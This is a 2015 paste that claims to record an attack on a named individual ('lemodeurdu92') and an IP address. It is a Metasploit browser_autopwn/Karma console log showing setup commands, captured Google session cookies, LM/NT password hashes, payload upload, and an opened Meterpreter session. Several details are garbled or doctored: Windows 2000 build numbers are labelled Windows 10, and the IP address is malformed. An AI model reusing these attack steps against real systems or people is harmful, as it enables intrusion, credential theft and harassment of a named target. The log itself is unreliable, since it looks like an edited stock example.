
Exploit | lemodeurdu92 By Fame (unfinished)

a guest
Oct 20th, 2015
  11. Exploit lemodeurdu92 / 81.56.17.144 By Fame with metasploit
  12.  
  13.  
  14. root@kalifame:~# msfconsole -r karma.rc
  15.  
  16. _
  17. | | o
  18. _ _ _ _ _|_ __, , _ | | __ _|_
  19. / |/ |/ | |/ | / | / _|/ _|/ / _| |
  20. | | |_/|__/|_/_/|_/ / |__/ |__/__/ |_/|_/
  21. /|
  22. |
  23.  
  24.  
  25. =[ metasploit v3.3-rc1 [core:3.3 api:1.0]
  26. + -- --=[ 2 exploits - 46 payloads
  27. + -- --=[ 12 encoders - 3 nops
  28. =[ 49 aux
  29.  
  30. resource> load db_JtebaiseMrJeuxMod
  31. [-]
  32. [-] The functionality previously provided by this plugin has been
  33. [-] integrated into the core command set. Use the new 'db_driver'
  34. [-] command to use a database driver other than sqlite3 (which
  35. [-] is now the default). All of the old commands are the same.
  36. [-]
  37. [-] Failed to load plugin from /pentest/exploits/framework3/plugins/db_sqlite3: Deprecated plugin
  38. resource> db_create /root/Jtebaisefame#never.db
  39. [*] Creating a new database instance...
  40. [*] Successfully connected to the database
  41. [*] File: /root/Jtebaisefame#never.db
  42. resource> use auxiliary/server/browser_autopwn
  43. resource> setg AUTOPWN_HOST 10.0.0.1
  44. AUTOPWN_HOST => 10.0.0.1
  45. resource> setg AUTOPWN_PORT 55550
  46. AUTOPWN_PORT => 55550
  47. resource> setg AUTOPWN_URI /ads
  48. AUTOPWN_URI => /ads
  49. resource> set LHOST 10.0.0.1
  50. ...snip...
  51. [*] Using URL: http://0.0.0.0:55550/hzr8QG95C
  52. [*] Local IP: http://92.155.192.243.9953/hzr8QG95C
  53. [*] Server started.
  54. [*] Handler binding to LHOST 0.0.0.0
  55. [*] Started reverse handler
  56. [*] Server started.
  57. [*] Handler binding to LHOST 0.0.0.0
  58. [*] Started reverse handler
  59. [*] Server started.
  60.  
  61. msf auxiliary(http) >
  62.  
  63. msf auxiliary(http) >
  64. [*] DNS 10.0.0.100:1276 XID 87 (IN::A www.msn.com)
  65. [*] DNS 10.0.0.100:1276 XID 87 (IN::A www.msn.com)
  66. [*] HTTP REQUEST 10.0.0.100 > www.msn.com:80 GET / Windows IE 5.01 cookies=MC1=V=3&GUID=e2eabc69be554e3587acce84901a53d3; MUID=E7E065776DBC40099851B16A38DB8275; mh=MSFT; CULTURE=EN-US; zip=z:68101|la:41.26|lo:-96.013|c:US|hr:1; FlightGroupId=14; FlightId=BasePage; hpsvr=M:5|F:5|T:5|E:5|D:blu|W:F; hpcli=W.H|L.|S.|R.|U.L|C.|H.; ushpwea=wc:USNE0363; wpv=2
  67. [*] DNS 10.0.0.100:1279 XID 88 (IN::A adwords.google.com)
  68. [*] DNS 10.0.0.100:1279 XID 88 (IN::A adwords.google.com)
  69. [*] DNS 10.0.0.100:1280 XID 89 (IN::A blogger.com)
  70. [*] DNS 10.0.0.100:1280 XID 89 (IN::A blogger.com)
  71. ...snip...
  72. [*] DNS 10.0.0.100:1289 XID 95 (IN::A gmail.com)
  73. [*] DNS 10.0.0.100:1289 XID 95 (IN::A gmail.com)
  74. [*] DNS 10.0.0.100:1289 XID 95 (IN::A gmail.com)
  75. [*] DNS 10.0.0.100:1292 XID 96 (IN::A gmail.google.com)
  76. [*] DNS 10.0.0.100:1292 XID 96 (IN::A gmail.google.com)
  77. [*] DNS 10.0.0.100:1292 XID 96 (IN::A gmail.google.com)
  78. [*] DNS 10.0.0.100:1292 XID 96 (IN::A gmail.google.com)
  79. [*] DNS 10.0.0.100:1292 XID 96 (IN::A gmail.google.com)
  80. [*] Request '/ads' from 10.0.0.100:1278
  81. [*] Recording detection from User-Agent
  82. [*] DNS 10.0.0.100:1292 XID 96 (IN:Fameofficiel@gmail.com:A gmail.google.com)
  83. [*] Browser claims to be MSIE 5.01, running on Windows 2000
  84. [*] DNS 10.0.0.100:1293 XID 97 (IN::A google.com)
  85. [*] Error: SQLite3::SQLException cannot start a transaction within a transaction /usr/lib/ruby/1.8/sqlite3/errors.rb:62:in `check'/usr/lib/ruby/1.8/sqlite3/resultset.rb:47:in `check'/usr/lib/ruby/1.8/sqlite3/resultset.rb:39:in `commence'/usr/lib/ruby/1.8/sqlite3
  86. ...snip...
  87. [*] HTTP REQUEST 10.0.0.100 > ecademy.com:80 GET /forms.html Windows IE 5.01 cookies=
  88. [*] HTTP REQUEST 10.0.0.100 > facebook.com:80 GET /forms.html Windows IE 5.01 cookies=
  89. [*] HTTP REQUEST 10.0.0.100 > gather.com:80 GET /forms.html Windows IE 5.01 cookies=
  90. [*] HTTP REQUEST 10.0.0.100 > gmail.com:80 GET /forms.html Windows IE 5.01 cookies=
  91. [*] HTTP REQUEST 10.0.0.100 > gmail.google.com:80 GET /forms.html Windows IE 5.01 cookies=PREF=ID=474686c582f13be6:U=ecaec12d78faa1ba:TM=1241334857:LM=1241334880:S=snePRUjY-zgcXpEV; NID=22=nFGYMj-l7FaT7qz3zwXjen9_miz8RDn_rA-lP_IbBocsb3m4eFCH6hI1ae23ghwenHaEGltA5hiZbjA2gk8i7m8u9Za718IFyaDEJRw0Ip1sT8uHHsJGTYfpAlne1vB8
  92. [*] HTTP REQUEST 10.0.0.100 > google.com:80 GET /forms.html Windows IE 5.01 cookies=PREF=ID=474686c582f13be6:U=ecaec12d78faa1ba:TM=1241334857:LM=1241334880:S=snePRUjY-zgcXpEV; NID=22=nFGYMj-l7FaT7qz3zwXjen9_miz8RDn_rA-lP_IbBocsb3m4eFCH6hI1ae23ghwenHaEGltA5hiZbjA2gk8i7m8u9Za718IFyaDEJRw0Ip1sT8uHHsJGTYfpAlne1vB8
  93. [*] HTTP REQUEST 10.0.0.100 > linkedin.com:80 GET /forms.html Windows IE 5.01 cookies=
  94. [*] HTTP REQUEST 10.0.0.100 > livejournal.com:80 GET /forms.html Windows IE 5.01 cookies=
  95. [*] HTTP REQUEST 10.0.0.100 > monster.com:80 GET /forms.html Windows IE 5.01 cookies=
  96. [*] HTTP REQUEST 10.0.0.100 > myspace.com:80 GET /forms.html Windows IE 5.01 cookies=
  97. [*] HTTP REQUEST 10.0.0.100 > plaxo.com:80 GET /forms.html Windows IE 5.01 cookies=
  98. [*] HTTP REQUEST 10.0.0.100 > ryze.com:80 GET /forms.html Windows IE 5.01 cookies=
  99. [*] Sending MS03-020 Internet Explorer Object Type to 10.0.0.100:1278...
  100. [*] HTTP REQUEST 10.0.0.100 > slashdot.org:80 GET /forms.html Windows IE 5.01 cookies=
  101. [*] Received 10.0.0.100:1360 LMHASH:00 NTHASH: OS:Windows 10 LM:Windows 10
  102. ...snip...
  103. [*] HTTP REQUEST 10.0.0.100 > www.monster.com:80 GET /forms.html Windows IE 5.01 cookies=
  104. [*] Received 10.0.0.100:1362 TARGET\P0WN3D LMHASH:47a8cfba21d8473f9cc1674cedeba0fa6dc1c2a4dd904b72 NTHASH:ea389b305cd095d32124597122324fc470ae8d9205bdfc19 OS:Windows 2000 2195 LM:Windows 2000 5.0
  105. [*] Authenticating to 10.0.0.100 as TARGET\P0WN3D...
  106. [*] HTTP REQUEST 10.0.0.100 > www.myspace.com:80 GET /forms.html Windows IE 5.01 cookies=
  107. [*] AUTHENTICATED as TARGETP0WN3D...
  108. [*] Connecting to the ADMIN$ share...
  109. [*] HTTP REQUEST 10.0.0.100 > www.plaxo.com:80 GET /forms.html Windows IE 5.01 cookies=
  110. [*] Regenerating the payload...
  111. [*] Uploading payload...
  112. [*] HTTP REQUEST 10.0.0.100 > www.ryze.com:80 GET /forms.html Windows IE 5.01 cookies=
  113. [*] HTTP REQUEST 10.0.0.100 > www.slashdot.org:80 GET /forms.html Windows IE 5.01 cookies=
  114. [*] HTTP REQUEST 10.0.0.100 > www.twitter.com:80 GET /forms.html Windows IE 5.01 cookies=
  115. [*] HTTP REQUEST 10.0.0.100 > www.xing.com:80 GET /forms.html Windows IE 5.01 cookies=
  116. [*] HTTP REQUEST 10.0.0.100 > www.yahoo.com:80 GET /forms.html Windows IE 5.01 cookies=
  117. [*] HTTP REQUEST 10.0.0.100 > xing.com:80 GET /forms.html Windows IE 5.01 cookies=
  118. [*] HTTP REQUEST 10.0.0.100 > yahoo.com:80 GET /forms.html Windows IE 5.01 cookies=
  119. [*] Created UxsjordQ.exe...
  120. [*] HTTP REQUEST 10.0.0.100 > ziggs.com:80 GET /forms.html Windows IE 5.01 cookies=
  121. [*] Connecting to the Service Control Manager...
  122. [*] HTTP REQUEST 10.0.0.100 > care.com:80 GET / Windows IE 5.01 cookies=
  123. [*] HTTP REQUEST 10.0.0.100 > www.gather.com:80 GET /forms.html Windows IE 5.01 cookies=
  124. [*] HTTP REQUEST 10.0.0.100 > www.ziggs.com:80 GET /forms.html Windows IE 5.01 cookies=
  125. [*] Obtaining a service manager handle...
  126. [*] Creating a new service...
  127. [*] Closing service handle...
  128. [*] Opening service...
  129. [*] Starting the service...
  130. [*] Transmitting intermediate stager for over-sized stage...(191 bytes)
  131. [*] Removing the service...
  132. [*] Closing service handle...
  133. [*] Deleting UxsjordQ.exe...
  134. [*] Sending Access Denied to 10.0.0.100:1362 TARGET\P0WN3D
  135. [*] Received 10.0.0.100:1362 LMHASH:00 NTHASH: OS:Windows 10 2195 LM:Windows 10 5.0
  136. [*] Sending Access Denied to 10.0.0.100:1362
  137. [*] Received 10.0.0.100:1365 TARGET\P0WN3D LMHASH:3cd170ac4f807291a1b90da20bb8eb228cf50aaf5373897d NTHASH:ddb2b9bed56faf557b1a35d3687fc2c8760a5b45f1d1f4cd OS:Windows 2000 2195 LM:Windows 2000 5.0
  138. [*] Authenticating to 10.0.0.100 as TARGET\P0WN3D...
  139. [*] AUTHENTICATED as TARGETP0WN3D...
  140. [*] Ignoring request from 10.0.0.100, attack already in progress.
  141. [*] Sending Access Denied to 10.0.0.100:1365 TARGET\P0WN3D
  142. [*] Sending Apple QuickTime 7.1.3 RTSP URI Buffer Overflow to 10.0.0.100:1278...
  143. [*] Sending stage (2650 bytes)
  144. [*] Sending iPhone MobileSafari LibTIFF Buffer Overflow to 10.0.0.100:1367...
  145. [*] HTTP REQUEST 10.0.0.100 > www.youtube.com:80 GET / Windows IE 5.01 cookies=
  146. [*] Sleeping before handling stage...
  147. [*] HTTP REQUEST 10.0.0.100 > www.yahoo.com:80 GET / Windows IE 5.01 cookies=
  148. [*] HTTP REQUEST 10.0.0.100 > yahoo.com:80 GET / Windows IE 5.01 cookies=
  149. [*] Uploading DLL (75787 bytes)...
  150. [*] Upload completed.
  151. [*] Migrating to lsass.exe...
  152. [*] Current server process: rundll32.exe (848)
  153. [*] New server process: lsass.exe (232)
  154. [*] Meterpreter session 1 opened (10.0.0.1:45017 -> 92.155.192.243.9953)
  155.  
  156. msf auxiliary(http) > sessions -l
  157.  
  158. Active sessions
  159. ===============
  160.  
  161. Id Description Tunnel
  162. -- ----------- ------
  163. 1 Meterpreter 10.0.0.1:45017 -> 92.155.192.243.9953 ESTABLISHED